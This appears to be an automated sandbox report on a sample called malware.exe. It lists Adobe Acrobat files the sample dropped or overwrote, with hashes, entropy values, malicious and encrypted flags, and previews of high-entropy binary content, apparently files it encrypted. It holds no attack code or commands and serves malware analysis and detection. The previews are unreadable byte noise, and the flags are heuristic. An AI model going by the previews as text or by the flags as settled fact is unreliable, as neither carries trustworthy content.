                        SSDEEP:384:XB+fkZzWp+lkaTZxNXp36uDsbxvvHMAa4XC+DTs1rYF+XbTmKTnS:XB+fWSp+eaTZ7B6uDsbJja4TPs1r9iKm
                        MD5:8075DE6A06B9354D396D7F9617881B91
                        SHA1:836247639A55F2013CEC0586A06EC5AAF8CD2EFD
                        SHA-256:A14E230E08C19B1FC53F8B2BF8850A45BD935E20E0C4639D706B4F6D871EEFD3
                        SHA-512:5CF154648918DBF5953E41559220E0C4C7AC2C51D66A54CF00BECEA5F888A5F656BC71E5E235045C3CE595341AEE337F936C52ECB8C5434BB624E729277ABE13
                        Malicious:true
                        Preview:.....V2....s8;..+-....1uZ....d..tkF^....K.z...?...4....F0r.|....XO.,...uk.%...V.hR@....B_h.FGrk.'T5.O..1v1.......I.C3.....]gq....Q.......}.'A}%.z.J.).......,.;.9q.w...5`#.............}?..*..<..BVf.9e...:..'../....}..$".u.00..WW..%Z..)..B$.n1..RX.r..d'..n....?........t.!..../t....ti... ....)+..[.^.TupU...N...n.*>.a .%.&#SZ.ws^..........X4_.C'v.E...K@d....WQ../9.M.B....O..g=.t....P..../+...'W..-.e.....GiR....z..{.q...."...w.....^4.Bm<..=.!u.[.'v..D....J..Q%*..0.=7O2.....H.J..6....\..k.../5-U.6j)..~5...*.6....=.#..A\h.bS... J-y.!.h..N... :..&..,~...-V.x......#x...+.2A..*R.y.G#P.{de...:.O.....pE.!}<@.D./.......S.jT.z..2U..o..k".l>.Q..J..]p.M9.oP~6.M.ax..\....".....2@O[.d...n....7.{.V.. sL.>.A .b....Cv.....iC....^J.K......G..5E.7....&|.Z..Ey.H\pN...?a./%_.....l2_n/v....'0.8.p......2...c...<P....DqC...E..ItZ....L..AT..t.R?.e.z...^?.|.!d.p).....4t[.D.Mu.uc..i.Hz%...U..._..S........k.>.i..I.A.R.t....r.0.....M.........j.)...oma.<.I.rR[...#...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20568
                        Entropy (8bit):7.991639662069097
                        Encrypted:true
                        SSDEEP:384:3CEaLBrFuS2VZqwQ4SFGoW7yxmgbP3uqql6UCitU6AaPCuBKZC9cpnk/zb:3CRpf2iFbWVgT3rqaitPG/G/zb
                        MD5:039F8CEE2C0F737F3753EB18368C53FD
                        SHA1:DE825B6E6192B733108BE4C3204649D26B311AD8
                        SHA-256:C84696BB5DFBC4B38F42CBB416C66B984024DDDAF92748FB0AE7663151044B2B
                        SHA-512:3C9CE0E3E8C1988AA1FCBFD5E2EBD74CD2471F58FD63E91C25874215BD1240948AF19DEDDEB388147519249133E8686F164375195548F0DADBC5BE698A241278
                        Malicious:true
                        Preview:.......RV8....hv.c ......3;........k...u..........}*Q....x....Y`.#f..Nr8n..B".&E....R(..a....*.b.....m..L..HI.!*g.#5..Y...'T......^..`.:_.R..;.LH9|D..~.....e.I...H}..=.vH6b..W.h.I......:H...A.h.....(/..8r...rm.&.R.t....O.U..R.5...N.1..Y5....:y....8}}t$... ...6...9.......y.Gjp8X.n..up.H.. J....T.Goj...O.'..*o5.YZ..,..e....I4.T6..O9.J6|4Q'..Q.?}e0...).D.2...H.V0J...8..B.T...z:./p...h;.^.m.i..v.k..*k<u..xt2..8Q;...m..k...).n.!...){Z..7.(+..#..!5......PYC%.+u.H...He.p......uu?...a...[.@..p.$.)S".r.T.S..uJ...B..E...K8.}4...Ml....`.)j.~/E..:..<.O........4[...2rW..$.{X.9n.......4g...7Fc.;.%.....P......6.".TL......@.c....<...J.&...Q;m........V..2.......D.....Y0+y".`..n.BS7....8....H.6..j..Fw..)N.&h:..'..2.-....MR..:Uj}.c[F ......iR.B......3.9....r\E~uw..&F....4....v..EL.....u..T%...oy.O..p...^.e.Q.D._j..B.f2..!..Ud7*./...3.S.k...|...e.6...5c.+@.v<...C/...;?:.b&..`j..1...zQ.../`..Aon......Y....<0..T.......T..h.?.@.~.].X}.?.Ah.m\v.....?_. .f..}...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20568
                        Entropy (8bit):7.990920804399917
                        Encrypted:true
                        SSDEEP:384:c+Jw7+ccR5U7XdbO/Kv9Q8wEC9y0tR/34l8OKLjpk9En+F07hJRlFUwtxJY1lJD:e7FcR5wd6/y9Q8w7LH/omOKLjpYA5Lvc
                        MD5:38D776A717CBC488AE0327F05E176A23
                        SHA1:47CBB27BB9C520BF2C62A09C759C9ACEDB098F6E
                        SHA-256:B6888168E02469C20D47EAF84F85B67DDE9AD54984671855BDC14F59A2C47900
                        SHA-512:47A3C44210B91C6E7E8C78C02CEDF376F30B7BFFA3AA49245407A750A974ED953DBFB3B63935B2A6547814F8CC3223A2ED8AA1393F059569671BC54B1F2C1A55
                        Malicious:true
                        Preview:Q.)......{.F,k.#..b,..U......?..!.{.Y7...1Z(4......w&..H..`.(.^Z{.AM.....d%.B .]....oX.........iDcH.j'd..'Jg.a.....o."%...+..v..".<....C1....!.H]ye...y4..`....EX...i.B...iQ3....A..}.S%.. .8Kw...I......x..0:1.).H@."c..~..x.#.c..y6r.ke..|..0.P[oe...Z..*0u.g..?<Jt.,Z...m.?..W.:.mfs.[....p.(U.`.$.....le...4.(.......c.z...Gm7..]..9De...)..:.KA.<./..W.s...C...3>.u.@,3..d......m....H.a.1...C.*....2.~....w...,H%...F..*...?.*.e..3.S.....>.....+.0.H.sccb..........M.../.....L+..R.....e.....3.-....q t..&.-..F....9.....uG...UK.....\...%.N.....].8. m.HE\<.9..m.04.>.g.x...+...)..2....G.l.b.o...../@....&...o..B0.s...:..hF.qRn~.gR.z...=..R.l"E.d._#...b<..:=PT.x..m$......@........w\.).y..~...e..1z2..$...oD....,.....$~.......w.g..&......K..p.u...............y.h.#..-...I-p....B4..P.....Y;....}.....XN_/.U..2...0..nr.< ..).....L..[B].b.......R.K..U.n.Qu...'....#...._<...h5..H*f.G..o...H.E.o.......7d...2.}.HFr..5....6.....m^..1T...a.K..<....*.[w.j.29.M9

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19611
                        Entropy (8bit):7.9923807403672305
                        Encrypted:true
                        SSDEEP:384:H3HZxpVVfoL4Q2z3Dj98IWh5lM+243RZNjv32RewcORLh+H0C5:3ZhVgsAbh5lM+hRODcO20w
                        MD5:742FC06A279EC9E615D6F66E5E141D93
                        SHA1:D36F9155E28F6D2BB35AEF101A22D91605433D27
                        SHA-256:5AB7F97F8D71CBBFC36E2E1B1D5EE53E1290F2F8118DCDF60BBB1B8221F93680
                        SHA-512:C4297672D9B69D866007AC3739B2076A6D52BD7C6F62462D46DD89617A156F3A5ADA6CDDB3F553713CCA38F2083F2E72AB08F40AF768CE89250CC73C27EBCE0D
                        Malicious:true
                        Preview:Z.Z-..e......,..Y.2.... .'78.....OUBz..6@...yy.T..._...I..W.....H.....a.E...@y.........n]..6C...I....iP.w.zA....8.i...5...J..v.....&r..?.g....v..p....6,..$.hG..Ja..eg_..^....e..W.1......yr..s..-. A....].C.$@....a$.Ax7.....L.x....6X..*.4J1..A@.v.#A.qjXp'.-ELw.....]8K.>|8..h`.e'..R...`P...$.M8...ZAhx~`>.1."X./S....e`Hyv..Nx5..cr...6....q.^|+.9..zV<.x6.V#.]0.?...."6..f....:."...CH-R.&..<..}..T..y.Q.n.AW...J.El..r.*l}.....4....7qfJ.^.k...Qi.....u......)._...#..g....m...[.. ..8..P0.7..#g.O....i]....=.].H9.PX......m.>.G.u.........&Go.$....BV.L...C...r..........D.n..m......2....m.,...&RPI...?.1&...E....sG*..z.H])@RU...1.... Y'......8..B./.m..u.d....R...g.b...4..S...x..efv.v.....3......~.h......vi...*.`(C2..+c....e.G....../.[Y.9....?..$...*Q..;.&.....[..1...7.....6.o...>OCc..[..@Z..N..D..|....Z,...#.]...j...........rg0.<.'=.`'.&,......e.oBj1.L<7x.X57S._W..`...e..q.{.~...#..\Bx....[........%5`2......*...V..&.Zj...3...\.........M.k..:([...1...^

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19793
                        Entropy (8bit):7.990850749378265
                        Encrypted:true
                        SSDEEP:384:CCtLmltqW/AQcY5qRISlVa9g7U75vjp1ziJxLmaO/6EjkVPYkK6T3jqz:CCLml1ApYARISO9gyxziqaO/376T+z
                        MD5:21C1F7EC3A64F1F5B1635DF5F668D43D
                        SHA1:CC1F94572B564511DF8E0FA99130ED4AFE13ED7B
                        SHA-256:22BA452552D3F250F29735A3278A7B5D6713CC4156F930DC4E5DC69A6DB4A51F
                        SHA-512:1B387132DE3773452D246E578C5F3632925D615BDA0E2127BD0BB7FB252B52829876D7FCF68BFA37A58428C9D66D7861B9F52322CBBFEEC6A92C0EC19CDB31FD
                        Malicious:true
                        Preview:~..+..Xr.>f.A4.*.[...].m...x.V...*?..G.T.......M.a.:.(.X....uk../..9..7t..,..Fz.D.....5a..&~.Z.oA.u.CD."L1]G..6...b.nZ....:..)c.^..*#.....g-../..Y..>02[....J.....yQG..*"..".6.s....M.4....l'.}..C...yA....J3..\p.dt....n..(..T.U.3..._.*@N./qQH..g.%.9J...Wj.B..&.O..........G~%.W.. 1..s..x.:.p....K.:.?......v......W+....e....).......r.1.....>.5W..(..|......@(...lJn..;...f..pi.i...k.X..z.h(p^[.Ip^...-............\..'.]....'.o7I...a(!.wU....^h`.P3.....7.H. .ay..z.4.yM..p..[Rd?.*...$U%..%.5..6:...h;.Q0...Xa..].O.'C...&..,?...E.v...X\0...xE.=...........`!U.E.f....a...R.O4..V.<Z.~Y.'A..|u.".dc..e......Z G. .T-^.....h.}.....uk..-..zC...*....KkX..Y.U.p-....#.=.O.U%9.g..t.g.%.le"w.......&@..q9....Uul..\u..r.ekV.;.....FJj....S.7.s.x@..9.".*..../...U.W).r...@@;<.....x....<Oo.,.SO..Q.o\..8.....P...B...v....P.)z.x.JrjC.B.J.....nE..K.Y....}...r.2.H4.{........\...-....?Sf.(A..>.=.N.P..0......#u..PDT..fR._.....t..Ge.8......xlr.m....$.#L.._.g.\k..#..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):18774
                        Entropy (8bit):7.9905383142731115
                        Encrypted:true
                        SSDEEP:384:UMwXA0pkpdJzjujtK3Yc/F+7Z+2l24GfFfkEQtDztJt:J8NmDEjyYU+F+2l24yFsJt
                        MD5:5DE619BCC3FCB6AB8B8746DCBDCE838F
                        SHA1:B5BD14D649A0226353B1CE8301B6426E8E6956F2
                        SHA-256:7AD312C1664B656F82D6B7776EB80DE78EFCF1FD84471D7CCC6F8064B1AA0E6F
                        SHA-512:32D58D859A794CD1F0947CFE5AB722A91744C5670F99E41CD399C7FA64062CCA008758F839044CBD14EC51AE230FE21FB73BDA6BD202501D54AFB1A1B031F19E
                        Malicious:true
                        Preview:..P.Y...J...Lm..p..#.g-O...........u"%d..B.3B..s....dC.i..+..!*X....S.....?\..;...C<.....a.n)..o.J.8k......q....;P1.eO}...:r.^b;..P9j:.MY#......$...qD_)|..8...J.....*ua.a.....+.......K.0..b....6.Yf.X.v.-......QpF9.h.Y.O..[.=qx).....fl...z.......XGp=..3.U....Im....z.\....)...p.+.t..V.....C,...4.t.A}.N..{.5....F..6h.\..[r.@.S.}Q..._5.T..S..`^.eH/.*-M....{..L..U..01;.HX).iz..p4.\.....W..&?.x..C.....s......2Kg......e.192.6.........q.E......).,...-.R.{.t..Fs......m..2..S.H..zI..U5."9..Y.....-..6..`...t.+Q$..#.....h.gJ@.w....OCp..9t.P.v.R.....%hu.=..R......:...Bj..<s)*..B.9...B...Q....I.n..wp...C.4.u...|]..$.z....u..I(3.D...Y"....l..B":.3.2*U.t.".aq......Z..@....0.2.M.c.Yd'0%:<t.8"&.-.....uv..6.J.....Q..ii$.y".%j.......07..2.$.....OP....` ..:4..=....&..R.T7.AE].\....5....O[..o.M.j...<.KcQ..H.,>..%.%../{.w5^..&J.;..U.....53..Od..;..../Lc.\..}X..y>. .......Z.@"%.._.M.gG$)e42..k..-....R..I.........e...7b..lk ...^.W....7O[.|.....v.W......$.K`..KRSt

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19692
                        Entropy (8bit):7.98868966504114
                        Encrypted:false
                        SSDEEP:384:jFeD7hQ8hEiQS7ifF8A3xN4MVZHSXySe1O82qs1Pra3Ml6fJmuVKms:jFeD1Q5FoA8SZUgs1Da3MoxmuE
                        MD5:38289C3692E1D29D67250B19CBD43FB4
                        SHA1:FD2583B34D1E54D40E699DB1ED1C15B229E3F189
                        SHA-256:0B1EA6661777C64BB59E7C0D2375C597DF1FACB965140E88C70F55E97514FAA4
                        SHA-512:9274F38CA45AF32B736267C5746A5368FBFE39C900F686D1E3CB05847C4C9E69D8A64C30AA3DC19154EE60B2B929F8E5A22F71F4ABBD0B518B5FBE0EDEF44BAA
                        Malicious:false
                        Preview:........;..1+..biR..q.!..B.=$Y.o..a.PK..N.V..w..f.r....C.p.....f-h_..q}g..#............E!w.bt...I..M;K.C..@.?.a@..H.y....1ZgA.f..$..+.jYc....gX.......O..W.z.RXn)...Z..(...U..f.y.$.....5._f..3.{.r....%..y...:=.....j..d...v}(.!.....pUJ..Mp....T.bM..U..[.jq.P.....|..../..6..Y.e....WX...*%..k...{h.P0.$...}.-..Q,N....*bU.P.Q.$..8.Z;....p.\.@w.R..S....EQ..@>...s.....D-.#.9..)./PeZc.3.}&...#..,.\..#..G.D`...k;x.....w.......=.."....l....Eo...o....i%.E.Z~.[]..$.S...U..0.A6..d....OB...!........?;.u5;..&.m.8.....3.x`....N.6..M&1=.Z............H.7.&....K...F..r..?i.....m*.=*Dd.m..H].3.[qp..V....~.n.i..@..X.8..`.Y.Yz...g...P.`Q.e....q.;2>z..*.+.j......I..qfS..D..G...a.k...n9R0....=kX1.E.i.pL.... .H.a<<.l>..%H.5'U..o.Z.a......V....o..t$.$..D...\J #...u1.Q....IEm:oG...J>.]....].$N^Bl.t.q.F......w.>.q..Jq..n...$.MD. ..J.B.Q....+.B....K.}..z.*.o..x.u.v....g....(.....#..jU...e..........v.q.kx.CN!.|.....+/...l.K..N....j.....}{.w..P$..0..[J.Jj..._.4

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19289
                        Entropy (8bit):7.991179691952291
                        Encrypted:true
                        SSDEEP:384:Nya56/XAOaCLOsd3sRr/lZ0T6P0e7jLL7DtBuhflZILrpSmeO:d4XAOa+O1Rrn0Tu0I77xgUSlO
                        MD5:C7A3559CB937BFDB63D64815C50D8911
                        SHA1:424ABBCEAD134145F3A795BE089E93F17AEA2D2B
                        SHA-256:33F8E03FD07B72CEAFFA7FD90AFE59FF37DA2522429280B60E24C038DCCE5353
                        SHA-512:0D546EF9EE005250AC13D66EC3463629C224EFE3CE6C07C66A0FE659FA8298308A646534B0A2F5681665D9194DDF3337EC503E50F86BA1AEB7F9407BD9C47456
                        Malicious:true
                        Preview:....D)1N.)2K4.,T.Jt.}d.P.....:.k.H....z.>v.r.z..."q..........u.....*P.gP.3H{.1.No".r9.R.......".gS..9mp...L....jq.$.RKg.......=.........c.4>..[t."^#Em.>....u...%[...O.../=>...........$.........k...?&nn.P....R..a.T.A..<Ad.L.;~..&.C...[.+..T........`h(.....x..!zh.#GH$W.\V.k...PN...M#u...\.%..\.].#F.1K.....<.>U.,..h.d...X+q1s...R@Ke.QG........h.....3=...).s.'..,x8|..8.0.dQr..N.@.L..n.E....9..1pd.+>;i.K......9/5.~.......a.X.X.8..-...e.W..SJ..^./....'.J.[.].,.k`.W.L..c2.+L.<&......$...>:.d-.'...e..#...A1...~e..a.E.@(.9N[d.....^.......X.T..q.E.J..VJ..{.-.<...k3..Am..Q....R..`.1..j,...T...G..9..G..E...........y.l.._G......s.#.P.^..b`....'.S..jY..}<@..6.a.?#..c......d..r./...3..a!.\c.9F&.4.Y.......~.l..$.J._..nP.#...LB.P..E....;.>.^......0....h..w.}:....qQ.T..[&.\>.KX.Y...{a.R{y.FZ&c...q.Z.j.+.:.[.^.....Xx.KG ...v..D...-..G.....N.?"..3.K..t...8w.....#$.`..l.q.W:7..Q#.N..k....E....r.|...a.y..k..j ...xh.3...,W.+.*/Y...x......m.A.V....O.....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20567
                        Entropy (8bit):7.989261259424908
                        Encrypted:false
                        SSDEEP:384:mmr5lVlgPlcj8k3r0wcyEWl7p2cSpU0TBzHBGzkqIQniM1M0xQlQSksKf0aoT:mW5vlwlcj33Qwc3WucSSONhsDI0iMW3d
                        MD5:EF636CFC59BFF7A6A346F5680F3A1864
                        SHA1:F0F83226279FE0CE92690B4C82668F1F124AC528
                        SHA-256:F488428BB80ADA3C21679233E366AF30BD638BBEFD74DB61FDEEBF5C2CC8380F
                        SHA-512:A06A3CFC335953050E300D83AF987A4772F336A240BE627DDF4774CBA2BBD15740AA812205BFAA9CB7785E3409C3B95AB2FCA7BCA6E351ED4AF78C4AFCB89E01
                        Malicious:false
                        Preview:t..faq/J.5/..W...DgZ>...7]i............//c.LF9.&<...3......y9{........l....*..h..U:. :...2.n.>.K............B,..........vX.r.*.....\......_O.c.;.]n..;..=.@.4y......(X...^...Q.d.|...$m.^G2k.B.....q...C.ZS...L.5..7.E....a..\.#.W...}.]].F.*.... .xH.3...w4.4.Y."nKW.V.d..qkn.q.NU...;u.xod.%..,.s.dZ..$#.?....'Y>..K.....&...s...U......aGp1.b.e.?\r]..,}c.^.....V..$....../...r...@W...K....H....#(.J;.W... Gp.W.w...|l......]...\.sgs"7.....~..,./.S...$....0.an.._.s.8...3W.n.X..c.G.`.K...o.`Z...u.^..,...Wy;.....pc.gC..G)T.=..zE.G)L..v.Y.F.`i.<.Gt.......N.`.P...v...1.E(O...v..m ...1...B....+;....j5.V.J.6K.......&u.k...\#.,........J...S[.M..G,2....^.N.>..E4.r.y?....a..i....2.n.4....qSj8_..Z............0.J..:.........8.......w._.&j.-..EYS...^...W..!.../(m....Wa.DI....Q..4W......K?...J....g.....F..p..c..4.....bZ^m..C..v.yX...;O/.?{2T#.y,...h...cz)...GL.A.oC .z.@alR......"..{Hg.......t..4....}.y.UK..v<Z..E...M.V.V<.t.^..).&.>..........

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17744
                        Entropy (8bit):7.989819039525032
                        Encrypted:false
                        SSDEEP:384:DDxpiwVhKX9W1PMYCwMKUdSJLcG1TVRp4BJwiCsmwvSOpySBVY:xIwhOgxfCkUdfGlLpAXCs1vSTd
                        MD5:22A29CF6BEBEFA209D97DEFD65A7ADA0
                        SHA1:7C88EA2BD424A008CC7AAF9C2E3A89DA536F337E
                        SHA-256:10662E549E4A68CBAA2C79917633A593DDC1DB77811F1C25B95A762631984874
                        SHA-512:3B317422D9146E0C608D91653B794EE6B389DC506B73FB45603B7E389C5054C73889B8CCC7CA0054FFCDCAE3C5D158F64C73C3379B893D7ADA5A73820B51259B
                        Malicious:false
                        Preview:.I....c9...3 ..q7..tS>B.A2..P..%.p........>...:....F...Q...c'H...Wc..}.FM.i.>.... $.....K.N'.,.W..y'L<..K....)...v..9..qG.y.xh.7.d....9.\...1..................@.WrG;.q....P!j;...07...v..^\.l..h..........^....F.....JD).=.....I..8....iU."G.n...L.d...v...+..t..J-7...t....U$...bKI.gH.0...lW=..Uux#.....*...'..`...&..Nu~%.q+..T/...h..Np./....Pq...Q;...."...z....4.<...G7].+v.I...I..+..#..... i....0f..!77o....h`G5.zM........_.....AF...n.9:.....l...{..{....e{.B..XW.......P..9.N.........w..^x...d....:...j.d.`...9....... O.}....a......B...'....Dl......[.&G.TZ....x."..(.g........4\...eN6.P..f.7...K6..)=.E.....I.,....&G..0..<.."U.^<z#.{..$...m..<..!..=. *.JX....u..4.SD..:.,..W..Y..}...y{...'qd.......=....6...(L/.NO.A.....z..-....X?..y..[?...f.J..w. ..iIY..E.I.F..:Q>...6......U..2....GX..6ru..^..J.V<...Gk....we......u.tln.../3.. .P...9yB.@.$8#..4v(kOt..w.3.[<.&..0......>s. .e............e.K..&...DI...Y...E.B'.T.....],U....m+#..W.......=....6....s..d

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):25830
                        Entropy (8bit):7.9933900175976085
                        Encrypted:true
                        SSDEEP:768:TGqhXgFdJlNOsBxpKRKP/ATdMmSvmDBO5cG:TGqhXiBNO+URSATJSvmDs5R
                        MD5:6C3ECD5831956936A248602441DE2CB2
                        SHA1:CC8DA34624886322F8210E8F7BC1E45FBC3B1395
                        SHA-256:899E31309B8DF02D1E2FFF2B60AC62094841DF9D40C44EC42CA99F29CC195120
                        SHA-512:33485D6D07B3D6D0FBA9D789B2DF293F8BBE3D2490EB841DDFB23495BC4D65B2DDAA73DC23AAAE3BB02FA1C7AA9EBBC997C983827D39EC7122BABD38D223D4B9
                        Malicious:true
                        Preview:}...|7.....=za...M...a.........4q.'..-\..t.....K..>....}6...Y...d*.f.<.%..q$.7...tZ.FN......CX./..c....G..bP.....)A..E...........Z.h.....n...&u*......6u..N..=.X"/..........gjd..2Y....7.. :.....#.%..F..1.."..F>[.'.f@ %..)2.&6......y..kh..O.L.v%.u.<*l=.V......|n.t.K..x@?....b.Y.~8..).......b...'...F.<KW..*H+.[6.,..2J.S.7.M.7.>...O...v...D.s.u<b.%..b.`..._.q.MAH..zPu.......;E.6.l^0.<....I.ta..(.2....1K.P.|ng#A.)g.............V?.nH...2B.Df.N..8i!.....'mM.......W..X..>v.Na).t.M4..q5..P"[......j.R0.!.w0.v}..)Y.6.;.....[.6.t.."....O.[..d..]......Y.N.D7VRX.Z.N.....\.p.?2..".\>...}x..=s.a.gA1.M...?.r...v........_..,....k.3.(.3~......e.s.<..,.l_cp..'.A./.v4.....Jr.....Q..a...W.=a.Y...!+..QA..6z...~zr..<......X....}bB.^d.....'B2.b5bt.#?....%.n...3...^.?.r...~0?K...8'.[...h......O...........j.X...~.x7MY..L.m.A.........;Y. @..Q..D$..x.Q.KO......?..(K...kL..jM.............^.i......|..z.Q...G..]!O......f .J.....q.....O......... .fJXU4u....!..v

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):67088
                        Entropy (8bit):7.996868338311888
                        Encrypted:true
                        SSDEEP:1536:m6WfmcQKBb6MAgjXEnK7fH91Obz0b7t1HAYbVPq6kidFK7yBdX:fWecQcPj91EYLAWi6kMrdX
                        MD5:F8A961EDED7E9821160CCE1B68470EC4
                        SHA1:31075AB8453FACE481D68F17B6ACEA1D9C2574AD
                        SHA-256:EF4A1913AD41186D251AE73E0B03297DB0680D916A2094E21C2B4DD1E0040EC5
                        SHA-512:A13FEAB14FE33041CC62F04B520DDCC705B45F27A49F1225A7EA68FDFBB2C1D16F2DF01B5C7229CCCB2CBEABB8F3914D1C54B32127A575E555ECFA636028FC9F
                        Malicious:true
                        Preview:.o].w...2jWS..P..3.....LS..ol.4.+.c...........n.m./...b..O%..x.2T.8.n.j;9...l2..ucX"..M..v.....].......Hz\.p. ...........?.....t..jlp...u..?..UQ..._.....G@~..\..<...f.&.FY......N&.O...;...>H.?.T.E...m..M.%.......$.mD...;.\....2..T..........[.t..u.j]..R.EX.qw.}.......7...1?...k.E.6........b8...pU+..h...`jk...).../5.^.....k.X....|..W3.!......gv...L....G..B..m...-08~.W.w...@1.b...s.Md4.......:..).jy.y...I......*.'....w..Q.....i....J.<...u..._......v/.B......wm.u.3.br.P2..&.O..@"._N.zi..y?*.)OC..Y.,..{.]..:.w'..i..!M.w.s?3.)..J.e\..3.pg...~.F..p,.......n(V..F6..F...z..z...?......A..7Za.V[.F*....Rr...".RA....F}.I....-Y..<.q^1.2..hk......M....p....;...pp..H.q...:D0.U.'@e*..2..Kn.t.hi....+G.%(..M......E../A.....W...N....+\..;1F<.c..Ek...........Fo.@.\=....4L.....toH.J.5..9D..(.Ju.........nU.m..p..uE...\t......|.....!..(..K.....I.N:..g0..F.h.Q.%...po..7.tl..+..zn7......^.._mY.o.,..).....g....h....L...9...I@.6..*%L.c.;.zO:..<...s..s....7YP01...0

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27136
                        Entropy (8bit):7.993122244779047
                        Encrypted:true
                        SSDEEP:384:9Ed2dNSf6PHKLk/IyyETIh0LkSBkOmnuL7CB4smdSMFmxIKoJEy5Os4npe:Cd8Sfk5/IyyETIWpBnmnieGt0oQsMA
                        MD5:CC3F2CA7477E5A81FBAC79DB847D8434
                        SHA1:50E5B123B1E0436C188B37E53D137A18607386B4
                        SHA-256:2F3E63259498B0C5AC34ED35334F2610F2665FE5BF24F7D7A2CA2B533F2C8DF9
                        SHA-512:1D0D0E445EF47378AA996743E38879137762EF3EC80497DC46165FBF553063E0F426D4CABDE4FA33505B8F9EDE6EB1B731049E27764FDB89B67CC1128A7BA2B0
                        Malicious:true
                        Preview:o..H.I?.V.j.J.-........<..!.cy<.?."........m..H*.>..........Za.Dv.70O.qSn!j.Q.....L..o.i..|.(?Z\..s...x.i.....j...3.+..-..9UJ?...v%k._..y...,.I-.V...(Xb.....U...%..5l.....H.#x8.Q....Y....K|....e...=i.O.H..}\....=-H.hT.....,...[.b....._...a....Tj...Z.r.E.m..y.r..u.+.S/..fUu...a.S~..c...?p@0?..|..z.......?.....G"..L4-} fv....x..!....1.p6..lSEk.Q..KgyC..&Lv..i..H.k.a...w....y.v .......s..4H[..#....\D....g.H..X.+.........:...K..QF\.$."..7..]fA......O...r.j.-.(kt..qm...g"Q+...Z.Vm..; ..Fb...r....m........3Q,<........f...<....@.W.~....+...O.]~k......XYJ...APO..-..p.H.w.w..?oO#.QU........sx...I..H....E)...T1E"k..#..K7+'.\..#....\.....'K.yL..4......t..0,..../..,..$..........u(.A...}..t....7>..........90F."I..6.zB$b#....?......f..x.N..V./8....6[..8.19...#.q6.G...V..l....6.`.*.+...m....3Vc.....M......Z. ..c...'..(....0.....f.....'.,G5...s....Ut=[..Co..n..b.*..E..R3.S....,...@.Kt8.&.......P. .,2...<.@rY..x...o.i.......n,P..6m.S...Dd6.tR.}c..~.]W. q.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):614706
                        Entropy (8bit):7.999693813842465
                        Encrypted:true
                        SSDEEP:12288:2MnklV/iBsr8GRi2FlKJB/ylV1SEth7ESwYLVOmfau14Lo7ZE:4lVdrtcIKL/uV1SEth7ES9rZE
                        MD5:CA2498A742E5CA9E441484AC8F737C02
                        SHA1:4D1F11FC8A9E4C76F7BE5D63BE34D3EE5D590198
                        SHA-256:5D8A74D110C277BF29E03989E3CED8EE306404D0BD00653D9BE67ECB9E319754
                        SHA-512:B860A44C9D252FD812BDD9E019ACE448892D45BD4535B22CC4594FB03F0E03704E1BDCC04B96C7271C046084930FC8176211F39C4189F56BE092CD98BE015B28
                        Malicious:true
